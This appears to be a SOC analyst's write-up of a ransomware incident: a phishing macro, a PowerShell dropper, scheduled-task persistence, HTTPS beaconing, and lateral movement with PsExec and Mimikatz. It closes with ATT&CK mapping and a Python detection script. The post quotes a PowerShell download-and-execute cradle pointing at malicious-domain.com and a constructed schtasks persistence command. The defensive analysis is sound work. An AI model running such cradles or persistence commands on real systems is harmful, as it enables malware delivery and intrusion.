Deep Dive into Recent Ransomware Attack: Analyzing the Attack Vector and Threat Actor TTPs

Daniel Osei — SOC Lead & Malware Analyst

Key Takeaways

  • The observed ransomware attack utilized a phishing email as the initial access vector.
  • Execution mechanisms involved PowerShell scripts alongside a sophisticated loader to deploy the malicious payload.
  • Command and control communications leveraged encrypted channels and exfiltrated data to remote servers.

Executive Summary

During a recent investigation into a ransomware incident, we observed that the attack followed a well-defined kill chain, utilizing known techniques and tactics prevalent among contemporary threat actors. Our analysis revealed a sophisticated approach that involved multiple layers of obfuscation and persistence mechanisms, ultimately leading to extensive data encryption and demands for ransom. As cybersecurity professionals, understanding the intricate details of this attack vector is crucial for enhancing defensive measures and mitigation strategies.

Initial Access

The initial access vector was a phishing email carrying a malicious attachment. Our review of the email headers and the attachment showed that the file was a .doc document containing a macro which, when enabled, executed a PowerShell script. That script downloaded the dropper from a remote server with the command Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious-domain.com/dropper.js'). Using PowerShell in this way reflects the attacker's preference for abusing built-in Windows functionality (living off the land) to evade detection.

Execution & Persistence

Upon execution, the dropper established persistence by creating a scheduled task named TaskSchedulerUpdater, configured to run every hour so that the malware is re-launched even after a reboot. The dropper decompressed the main payload into a temporary directory, specifically C:\Windows\Temp\, and then started an execution chain that applied several code-scrambling layers to encrypt its own code, further complicating static analysis. Our analysis of the payload showed it to be a variant of the Locky ransomware, characterized by its ability to encrypt files using strong AES encryption.

Command and Control

The command and control (C2) architecture was notably sophisticated. The malware communicated with its C2 server over HTTPS, so every command transmission was encrypted and difficult for network detection systems to distinguish from legitimate web traffic. During our traffic analysis we identified repeated beacons to the domain malicious-domain.com at intervals of approximately 5 minutes. Further investigation revealed that the server was hosted with a provider known for tolerating malicious activity, a choice often made by actors seeking to minimize operational risk.

Lateral Movement & Discovery

Once the C2 channel was established, the malware began lateral movement. We tracked several attempts to spread the ransomware across the network using WMI and PsExec. The artifacts we gathered indicated that the actor enumerated administrative shares with net view and then used those shares to execute commands remotely. The malware also used Mimikatz to extract credentials from memory, which facilitated unauthorized access to additional hosts.

Impact & Objectives

The primary objective of this ransomware attack was clear: to encrypt files and demand a ransom for the decryption keys. During our investigation we collected various encrypted file samples, and analysis revealed that the targeted file extensions included common business formats such as .xlsx, .docx, and .pptx. The ransom note gave clear instructions for payment in cryptocurrency, specifically Bitcoin, which is a common trend in modern ransomware operations. The attack's overall disruptiveness led to significant operational downtime for the affected organization, resulting in economic losses that are still being assessed.

MITRE ATT&CK Mapping

  • T1071 – Application Layer Protocol: The malware used HTTPS for C2 communications to evade detection.
  • T1059 – Command and Scripting Interpreter: PowerShell scripts were used to execute the dropper and later commands.
  • T1086 – PowerShell: The attack relied heavily on PowerShell for initial access and for executing the malicious payloads.

Detection Opportunities

  • Monitor for anomalous PowerShell activity (for example, download cradles spawned by Office applications) and for the execution of binaries or scripts from unusual directories, such as C:\Windows\Temp\.
  • Implement detection rules for scheduled task creation involving system-sounding names like TaskSchedulerUpdater that are not typical in your environment.
  • Analyze network traffic for suspicious outbound connections to known malicious domains, particularly those using encrypted protocols, and for connections that recur at fixed intervals.
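The detection opportunities above, together with the roughly 5-minute beaconing described under Command and Control, expressed as rules run over constructed Sysmon-style records (an added example, not code from the original report; the event field names, file paths, the allowlisted task name and the jitter threshold are assumptions):

```python
import re
import statistics
from datetime import datetime

# Constructed sample telemetry (not from the incident): Sysmon-style process and network records.
EVENTS = [
    {"ts": "2024-05-01T09:00:01", "kind": "proc", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -nop -w hidden -c \"Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious-domain.com/dropper.js')\""},
    {"ts": "2024-05-01T09:00:09", "kind": "proc", "parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /create /sc hourly /tn TaskSchedulerUpdater /tr C:\Windows\Temp\payload.exe"},
    {"ts": "2024-05-01T09:01:00", "kind": "proc", "parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\Temp\payload.exe", "cmd": r"C:\Windows\Temp\payload.exe"},
    {"ts": "2024-05-01T09:02:00", "kind": "proc", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
    {"ts": "2024-05-01T09:03:00", "kind": "net", "image": r"C:\Windows\System32\svchost.exe", "dst": "update.example.com", "port": 443},
] + [{"ts": f"2024-05-01T09:{m:02d}:{s:02d}", "kind": "net", "image": r"C:\Windows\Temp\payload.exe", "dst": "malicious-domain.com", "port": 443}
     for m, s in ((1, 30), (6, 31), (11, 29), (16, 30), (21, 32))]  # five beacons about 300 s apart with small jitter

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-expression|\biex\b")
EXPECTED_TASKS = {"microsoftedgeupdatetaskmachinecore"}  # constructed allowlist of task names; tune per environment

def proc_alerts(ev):
    """Run the process-creation rules over one event and return the alerts it raises."""
    alerts, image, parent, cmd = [], ev["image"].lower(), ev["parent"].lower(), ev["cmd"]
    if image.endswith("powershell.exe") and CRADLE.search(cmd) and parent.endswith(OFFICE_PARENTS):
        alerts.append("T1059 PowerShell download cradle spawned by an Office process")
    task = re.search(r"(?i)/tn\s+(\S+)", cmd)
    if image.endswith("schtasks.exe") and "/create" in cmd.lower() and task and task.group(1).lower() not in EXPECTED_TASKS:
        alerts.append(f"unexpected scheduled task created: {task.group(1)}")
    if image.startswith("c:\\windows\\temp\\"):
        alerts.append("binary executed from C:\\Windows\\Temp\\")
    return alerts

def beacon_alerts(events, min_conns=4, max_jitter=0.1):
    """Flag (image, dst, port) tuples whose connection gaps vary by at most max_jitter of the mean gap."""
    by_dst = {}
    for ev in (e for e in events if e["kind"] == "net"):
        by_dst.setdefault((ev["image"], ev["dst"], ev["port"]), []).append(datetime.fromisoformat(ev["ts"]))
    alerts = []
    for (image, dst, port), times in by_dst.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(times) >= min_conns and statistics.pstdev(gaps) <= max_jitter * statistics.mean(gaps):
            alerts.append(f"T1071 periodic HTTPS beacon {image} -> {dst}:{port} every ~{int(statistics.mean(gaps))}s")
    return alerts

def run_rules(events):
    findings = [(ev["ts"], a) for ev in events if ev["kind"] == "proc" for a in proc_alerts(ev)]
    return findings + [(events[-1]["ts"], a) for a in beacon_alerts(events)]
```

On the constructed stream the rules raise four findings: the Office-spawned download cradle, the TaskSchedulerUpdater task, the binary run from C:\Windows\Temp\, and the 300-second beacon; the single connection to update.example.com stays below min_conns and is not flagged.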

Analyst Notes

The patterns observed in this attack align closely with the methodologies employed by ransomware threat actors in recent years. Increased vigilance around email filtering and employee training on recognizing phishing attempts are essential defenses. Additionally, a proactive approach in monitoring for abnormal network behaviors and anomalous scheduled tasks can significantly reduce the window of opportunity for threat actors. Investing in incident response training and tabletop exercises can likewise prepare organizations to respond effectively against similar attacks.
